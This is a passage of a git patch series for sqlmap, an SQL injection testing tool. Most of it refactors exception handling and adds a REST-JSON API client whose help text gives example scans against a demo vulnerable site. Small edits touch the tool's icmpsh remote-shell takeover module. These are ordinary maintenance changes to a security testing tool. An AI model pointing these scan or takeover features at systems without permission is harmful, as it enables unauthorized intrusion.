From 924e31c4141dcfd37cca1fba11d4febbf33a4ebc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:04:36 +0200 Subject: [PATCH 01/92] Fixes #1394 --- lib/utils/api.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4b63fbfe6..dc88b8161 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -152,8 +152,10 @@ class Task(object): self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], - shell=False, close_fds=not IS_WIN) + if os.path.exists("sqlmap.py"): + self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: From e59a22019983e01c241a85fc7414df371614c270 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:10:47 +0200 Subject: [PATCH 02/92] Fixes #1393 --- lib/core/threads.py | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/threads.py b/lib/core/threads.py index 7a1f8d0f3..ec43ecd0d 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -10,7 +10,7 @@ import threading import time import traceback -from thread import error as threadError +from thread import error as ThreadError from lib.core.data import conf from lib.core.data import kb @@ -89,9 +89,9 @@ def exceptionHandledFunction(threadFunction): kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: + except Exception, ex: # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) def setDaemon(thread): # Reference: 
http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -145,8 +145,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio try: thread.start() - except threadError, errMsg: - errMsg = "error occurred while starting new thread ('%s')" % errMsg + except ThreadError, ex: + errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break @@ -178,10 +178,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: + except (SqlmapConnectionException, SqlmapValueException), ex: print kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) except: from lib.core.common import unhandledExceptionMessage From c1f829d1314221a10af7686b6b7a834db8560533 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:15:31 +0200 Subject: [PATCH 03/92] Removing last remnants of bad handling the exceptions as strings --- lib/controller/checks.py | 8 ++++---- lib/request/httpshandler.py | 8 ++++---- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f4c053ec9..6f266702f 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1278,8 +1278,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, errMsg: - errMsg = getUnicode(errMsg) + except SqlmapConnectionException, ex: + errMsg = getUnicode(ex.message) raise SqlmapConnectionException(errMsg) finally: @@ -1326,7 +1326,7 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - except SqlmapConnectionException, errMsg: + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check 
connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " @@ -1336,7 +1336,7 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(errMsg) + errMsg = getUnicode(ex.message) logger.critical(errMsg) if conf.multipleTargets: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 6906f4686..08e6b4193 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -55,9 +55,9 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % ex.message) # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni @@ -75,9 +75,9 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % ex.message) if not success: raise SqlmapConnectionException("can't establish SSL connection") From b6206692e08bc2c2083c55f65e8373e9dc55ce0d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 Sep 2015 11:53:29 +0200 Subject: [PATCH 04/92] Fixes #1392 --- lib/core/option.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index 5ebd228bd..ebef4b311 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -638,7 +638,7 @@ def _setBulkMultipleTargets(): for line in getFileItems(conf.bulkFile): if re.match(r"[^ 
]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: found = True - kb.targets.add((line.strip(), None, None, None, None)) + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" From 90329a8b01ecc77677d89c4a20731e1bc0e8d0dd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 9 Sep 2015 11:53:44 +0200 Subject: [PATCH 05/92] Minor patch --- lib/core/bigarray.py | 6 +++--- lib/core/common.py | 4 ++-- lib/utils/google.py | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 0e42433d8..f31b93eea 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -79,7 +79,7 @@ class BigArray(list): self.chunks[-1] = pickle.load(fp) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg return self.chunks[-1].pop() @@ -99,7 +99,7 @@ class BigArray(list): return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " - errMsg += "to a temporary file ('%s'). Please " % ex + errMsg += "to a temporary file ('%s'). Please " % ex.message errMsg += "make sure that there is enough disk space left. 
If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -115,7 +115,7 @@ class BigArray(list): self.cache = Cache(index, pickle.load(fp), False) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg def __getstate__(self): diff --git a/lib/core/common.py b/lib/core/common.py index 556865764..5f906cd8a 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3008,7 +3008,7 @@ def createGithubIssue(errMsg, excMsg): else: warnMsg = "something went wrong while creating a Github issue" if ex: - warnMsg += " ('%s')" % ex + warnMsg += " ('%s')" % ex.message if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" logger.warn(warnMsg) @@ -3567,7 +3567,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): request = form.click() except (ValueError, TypeError), ex: errMsg = "there has been a problem while " - errMsg += "processing page forms ('%s')" % ex + errMsg += "processing page forms ('%s')" % ex.message if raise_: raise SqlmapGenericException(errMsg) else: diff --git a/lib/utils/google.py b/lib/utils/google.py index 800f366e8..7849befbb 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -50,7 +50,7 @@ class Google(object): conn = self.opener.open("http://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex + errMsg = "unable to connect to Google ('%s')" % ex.message raise SqlmapConnectionException(errMsg) def search(self, dork): From 72cf9041bf4f721b2ec0f72e077da66bbce9c6bf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 9 Sep 2015 14:46:06 +0200 Subject: [PATCH 06/92] Fixes #1401 --- plugins/generic/databases.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 
a/plugins/generic/databases.py b/plugins/generic/databases.py index 195b2d6a7..7c671c92e 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -805,7 +805,7 @@ class Databases: elif "." in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): warnMsg = "missing database parameter. sqlmap is going to " From a29a3a4e5c1a8b2e7310ed386aba5c4b0796db48 Mon Sep 17 00:00:00 2001 From: daremon Date: Wed, 9 Sep 2015 16:14:04 +0300 Subject: [PATCH 07/92] Minimal API client --- lib/utils/api.py | 73 ++++++++++++++++++++++++++++++++++++++++++------ 1 file changed, 65 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4b63fbfe6..6c58b042f 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -12,6 +12,8 @@ import sqlite3 import sys import tempfile import time +import urllib2 +from pprint import pformat from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle @@ -31,6 +33,7 @@ from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.settings import IS_WIN from lib.core.subprocessng import Popen +from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook @@ -640,18 +643,72 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) +def _cpost(url, data=None): + logger.debug("Calling " + url) + try: + if data is not None: + data = jsonize(data) + req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) + response = urllib2.urlopen(req) + text = dejsonize(response.read()) + except: + logger.error("Failed to load and parse " + url) + raise + return text + + def 
client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ + help_message = ("Available commands:\nhelp\nnew: start a new scan\n" + "use TASKID: run task commands for this task\n" + "data, log, status: task commands\nexit") addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) + logger.info(help_message) - # TODO: write a simple client with requests, for now use curl from command line - logger.error("Not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - print ("\t$ curl -H \"Content-Type: application/json\" " - "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " - "http://%s:%d/scan/$taskid/start") % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port) + taskid = '' + while True: + command = raw_input('>>> ').strip() + if command in ('data', 'log', 'status'): + if taskid == '': + logger.error("No task id in use") + continue + res = _cpost(addr + '/scan/' + taskid + '/' + command) + if not res['success']: + logger.error("Failed to execute command " + command) + logger.info(pformat(res, width=1)) + elif command == 'new': + command = raw_input('Give sqlmap parameters e.g.: -u http://testphp.vulnweb.com/artists.php?artist=1 -o\n>>> ').strip() + # new task + res = _cpost(addr + '/task/new') + if not res['success']: + logger.error("Failed to create task") + continue + taskid = res['taskid'] + logger.info('Task ID is ' + taskid) + + # start scan + original_argv = sys.argv + sys.argv = [sys.argv[0]] + command.split() + try: + d = cmdLineParser().__dict__ + except: + continue + d = {k: v for k, v in d.iteritems() if v is not None} + sys.argv = original_argv + res = _cpost(addr + '/scan/' + taskid + '/start', d) + if not res['success']: + 
logger.error("Failed to start scan") + continue + logger.info("Scanning started") + elif command[0:3] == 'use': + taskid = command.split()[1].strip() + logger.info("Task ID is now " + taskid) + elif command in ('exit', 'bye', 'quit'): + return + elif command in ('help', '?'): + logger.info(help_message) + else: + logger.error("Unknown command") From 263665637ed6e91da4e74e956b146dec813dd141 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 11:34:03 +0200 Subject: [PATCH 08/92] Minor bug fix --- lib/utils/api.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index dc88b8161..88a03a19c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -554,7 +554,7 @@ def scan_log_limited(taskid, start, end): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()") + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: @@ -583,7 +583,7 @@ def scan_log(taskid): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()") + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database From 2453b02b63c9ed82681b6954a6575e1e8f3adf9d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:01:30 +0200 Subject: [PATCH 09/92] Update for #1402 --- lib/parse/cmdline.py | 14 +++-- lib/utils/api.py | 133 ++++++++++++++++++++++++++++--------------- 2 files changed, 97 insertions(+), 50 deletions(-) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2ad597188..bd06c1867 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -36,14 +36,17 @@ from lib.core.shell import 
clearHistory from lib.core.shell import loadHistory from lib.core.shell import saveHistory -def cmdLineParser(): +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ + if not argv: + argv = sys.argv + checkSystemEncoding() - _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding()) + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding()) usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ "\"%s\"" % _ if " " in _ else _) @@ -802,14 +805,15 @@ def cmdLineParser(): option = parser.get_option("-h") option.help = option.help.capitalize().replace("this help", "basic help") - argv = [] + _ = [] prompt = False advancedHelp = True extraHeaders = [] - for arg in sys.argv: - argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + for arg in argv: + _.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + argv = _ checkDeprecatedOptions(argv) prompt = "--sqlmap-shell" in argv diff --git a/lib/utils/api.py b/lib/utils/api.py index 2cbf7124d..ba1f02945 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -8,13 +8,15 @@ See the file 'doc/COPYING' for copying permission import logging import os +import re +import shlex import sqlite3 import sys import tempfile import time import urllib2 -from pprint import pformat +from lib.core.common import dataToStdout from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode @@ -645,16 +647,17 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) -def _cpost(url, data=None): +def _client(url, data=None): logger.debug("Calling " + url) try: if data is not None: data = jsonize(data) req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req) - text = dejsonize(response.read()) + text = response.read() except: - logger.error("Failed to load and parse 
" + url) + if data: + logger.error("Failed to load and parse " + url) raise return text @@ -663,54 +666,94 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ - help_message = ("Available commands:\nhelp\nnew: start a new scan\n" - "use TASKID: run task commands for this task\n" - "data, log, status: task commands\nexit") addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) - logger.info(help_message) - taskid = '' + try: + _client(addr) + except Exception, ex: + if not isinstance(ex, urllib2.HTTPError): + errMsg = "there has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % ex + logger.critical(errMsg) + return + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + while True: - command = raw_input('>>> ').strip() - if command in ('data', 'log', 'status'): - if taskid == '': - logger.error("No task id in use") - continue - res = _cpost(addr + '/scan/' + taskid + '/' + command) - if not res['success']: - logger.error("Failed to execute command " + command) - logger.info(pformat(res, width=1)) - elif command == 'new': - command = raw_input('Give sqlmap parameters e.g.: -u http://testphp.vulnweb.com/artists.php?artist=1 -o\n>>> ').strip() - # new task - res = _cpost(addr + '/task/new') - if not res['success']: - logger.error("Failed to create task") - continue - taskid = res['taskid'] - logger.info('Task ID is ' + taskid) + try: + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + except (EOFError, KeyboardInterrupt): + print + break - # start scan - original_argv = sys.argv - sys.argv = [sys.argv[0]] + command.split() - try: - d = cmdLineParser().__dict__ - except: + if command.lower() in ("data", "log", "status"): + if not taskid: + logger.error("No task ID in use") continue - d = {k: v for k, v in d.iteritems() if v is not None} - sys.argv = 
original_argv - res = _cpost(addr + '/scan/' + taskid + '/start', d) - if not res['success']: + raw = _client(addr + "/scan/" + taskid + "/" + command) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command " + command) + dataToStdout("%s\n" % raw) + + elif command.lower().startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + argv = ["sqlmap.py"] + shlex.split(command)[1:] + + try: + d = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + d = { k: v for k, v in d.iteritems() if v is not None } + + raw = _client(addr + "/task/new") + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task") + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client(addr + "/scan/" + taskid + "/start", d) + res = dejsonize(raw) + if not res["success"]: logger.error("Failed to start scan") continue logger.info("Scanning started") - elif command[0:3] == 'use': - taskid = command.split()[1].strip() - logger.info("Task ID is now " + taskid) - elif command in ('exit', 'bye', 'quit'): + + elif command.lower().startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command.lower() in ("exit", "bye", "quit", 'q'): return - elif command in ('help', '?'): - logger.info(help_message) - else: - logger.error("Unknown command") + + elif command.lower() in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 
'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) From b06a34ab1a8a829ce45eb08809ec4b23be51dceb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:06:07 +0200 Subject: [PATCH 10/92] Another update for #1402 --- lib/utils/api.py | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index ba1f02945..caa46c188 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -647,16 +647,17 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): run(host=host, port=port, quiet=True, debug=False) -def _client(url, data=None): +def _client(url, options=None): logger.debug("Calling " + url) try: - if data is not None: - data = jsonize(data) + data = None + if options is not None: + data = jsonize(options) req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req) text = response.read() except: - if data: + if options: logger.error("Failed to load and parse " + url) raise return text @@ -707,12 +708,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): argv = ["sqlmap.py"] + shlex.split(command)[1:] try: - d = cmdLineParser(argv).__dict__ + cmdLineOptions = cmdLineParser(argv).__dict__ except: taskid = None continue - d = { k: v for k, v in d.iteritems() if v is not None } + cmdLineOptions = { k: v for k, v in cmdLineOptions.iteritems() if v is not None } raw = _client(addr + "/task/new") res = dejsonize(raw) @@ -722,7 +723,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) - raw = _client(addr + "/scan/" + taskid + "/start", d) + raw = _client(addr + "/scan/" + taskid + "/start", 
cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") From 5172999b006c31cdcf9542dd30279968ddb1ab97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:09:24 +0200 Subject: [PATCH 11/92] Updating the doc/THANKS (#1402) --- doc/THANKS.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/doc/THANKS.md b/doc/THANKS.md index 931ab73bc..70fc97410 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -173,6 +173,9 @@ Ivan Giacomelli, * for suggesting a minor enhancement * for reviewing the documentation +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + Nico Golde, * for reporting a couple of bugs From 00955a7eb567607d49cdd54dc3293c99aeb72f58 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:19:09 +0200 Subject: [PATCH 12/92] Miniscule commit --- extra/icmpsh/icmpsh_m.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982..6e96952b3 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -76,7 +76,7 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: + while True: cmd = '' # Wait for incoming replies From 7a261ef447f0f0116608d3f27756e71598c83c2a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:19:33 +0200 Subject: [PATCH 13/92] Just in case commit related to the aee4c93c8b0ca9299134c65700675f8222e8a4d5 --- lib/takeover/icmpsh.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 2e5d3253c..fc742b04a 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -18,6 +18,7 @@ from lib.core.common import readInput from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException class ICMPsh: """ @@ -41,6 +42,9 @@ class ICMPsh: while not address: 
address = readInput(message, default=self.remoteIP) + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") + return address def _selectLhost(self): @@ -53,6 +57,9 @@ class ICMPsh: while not address: address = readInput(message, default=self.localIP) + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + return address def _prepareIngredients(self, encode=True): From f494004f44fc8825f963961c7136957d8e370674 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:51:33 +0200 Subject: [PATCH 14/92] Switching to the getSafeExString (where it can be used) --- lib/controller/checks.py | 7 ++++--- lib/controller/controller.py | 3 ++- lib/core/common.py | 23 +++++++++++++++++++---- lib/core/dump.py | 5 +++-- lib/core/option.py | 4 ++-- lib/parse/configfile.py | 3 ++- lib/request/connect.py | 31 ++++++++++++++++--------------- lib/request/httpshandler.py | 5 +++-- lib/utils/api.py | 3 ++- lib/utils/google.py | 3 ++- lib/utils/hash.py | 3 ++- lib/utils/hashdb.py | 5 +++-- plugins/generic/entries.py | 5 +++-- sqlmap.py | 3 ++- tamper/symboliclogical.py | 2 +- 15 files changed, 66 insertions(+), 39 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 6f266702f..2cb131ad3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -22,6 +22,7 @@ from lib.core.common import findDynamicContent from lib.core.common import Format from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode from lib.core.common import intersect @@ -1279,7 +1280,7 @@ def checkNullConnection(): logger.info(infoMsg) except SqlmapConnectionException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) raise SqlmapConnectionException(errMsg) finally: @@ -1298,7 +1299,7 @@ def 
checkConnection(suppressOutput=False): raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " - errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message) + errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: @@ -1336,7 +1337,7 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.multipleTargets: diff --git a/lib/controller/controller.py b/lib/controller/controller.py index d5793767c..0e82a7c23 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -24,6 +24,7 @@ from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite @@ -648,7 +649,7 @@ def start(): raise except SqlmapBaseException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) if conf.multipleTargets: errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") diff --git a/lib/core/common.py b/lib/core/common.py index 5f906cd8a..de7ce354c 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -879,7 +879,7 @@ def dataToOutFile(filename, data): f.write(data) except IOError, ex: errMsg = "something went wrong while trying to write " - errMsg += "to the output file ('%s')" % ex.message + errMsg += "to the output file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) return retVal @@ -3008,7 +3008,7 @@ def createGithubIssue(errMsg, excMsg): else: warnMsg = 
"something went wrong while creating a Github issue" if ex: - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" logger.warn(warnMsg) @@ -3567,7 +3567,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): request = form.click() except (ValueError, TypeError), ex: errMsg = "there has been a problem while " - errMsg += "processing page forms ('%s')" % ex.message + errMsg += "processing page forms ('%s')" % getSafeExString(ex) if raise_: raise SqlmapGenericException(errMsg) else: @@ -3670,7 +3670,7 @@ def evaluateCode(code, variables=None): except KeyboardInterrupt: raise except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): @@ -3977,3 +3977,18 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def getSafeExString(ex): + """ + Safe way how to get the proper exception represtation as a string + (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) + """ + + retVal = ex + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + + return getUnicode(retVal) diff --git a/lib/core/dump.py b/lib/core/dump.py index 4401f1742..a4ff91913 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -15,6 +15,7 @@ import threading from lib.core.common import Backend from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isListLike from lib.core.common import normalizeUnicode @@ -74,7 +75,7 @@ class Dump(object): try: 
self._outputFP.write(text) except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % ex.message + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) if kb.get("multiThreadMode"): @@ -94,7 +95,7 @@ class Dump(object): try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex.message + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) def getOutputFile(self): diff --git a/lib/core/option.py b/lib/core/option.py index ebef4b311..e9d4331b9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1523,7 +1523,7 @@ def _createTemporaryDirectory(): os.makedirs(tempfile.gettempdir()) except IOError, ex: errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message + errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) errMsg += "make sure that there is enough disk space left. 
